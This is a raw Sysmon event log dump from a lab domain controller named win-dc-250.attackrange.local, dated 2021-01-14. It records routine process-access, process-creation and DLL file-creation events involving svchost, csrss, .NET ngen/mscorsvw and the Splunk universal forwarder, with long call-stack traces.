13:26:20.371{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008549Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:20.371{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008548Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:20.371{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008547Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:20.371{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008546Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:20.371{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008545Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:20.371{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-467C-6000-6304-000000009A01}4480C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008544Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:20.371{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-467C-6000-6304-000000009A01}4480C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008543Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:20.231{08A6967A-467C-6000-6304-000000009A01}4480C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008542Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:20.230{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-467C-6000-6204-000000009A01}5028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008541Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:20.215{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-467C-6000-6204-000000009A01}5028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008540Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:20.215{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-467C-6000-6204-000000009A01}5028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008539Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:20.136{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-467C-6000-6104-000000009A01}5036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008538Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:20.121{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-467C-6000-6104-000000009A01}5036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008537Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:20.121{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-467C-6000-6104-000000009A01}5036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008536Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:20.058{08A6967A-467B-6000-6004-000000009A01}1316C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\524-0\System.Data.Services.Design.dll2021-01-14 13:26:20.058 10341000x80000000000000008562Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:21.683{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-467D-6000-6504-000000009A01}3340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008561Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:21.668{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-467D-6000-6504-000000009A01}3340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008560Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:21.668{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-467D-6000-6504-000000009A01}3340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008559Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:21.574{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-467D-6000-6404-000000009A01}4372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008558Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:21.558{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-467D-6000-6404-000000009A01}4372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008557Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:21.558{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-467D-6000-6404-000000009A01}4372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008556Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:21.449{08A6967A-467C-6000-6204-000000009A01}5028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\13a4-0\System.Data.SqlXml.dll2021-01-14 13:26:21.449 10341000x80000000000000008569Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:22.777{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-467E-6000-6704-000000009A01}2152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008568Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:22.762{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-467E-6000-6704-000000009A01}2152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008567Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:22.762{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-467E-6000-6704-000000009A01}2152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008566Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:22.433{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-467E-6000-6604-000000009A01}4500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008565Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 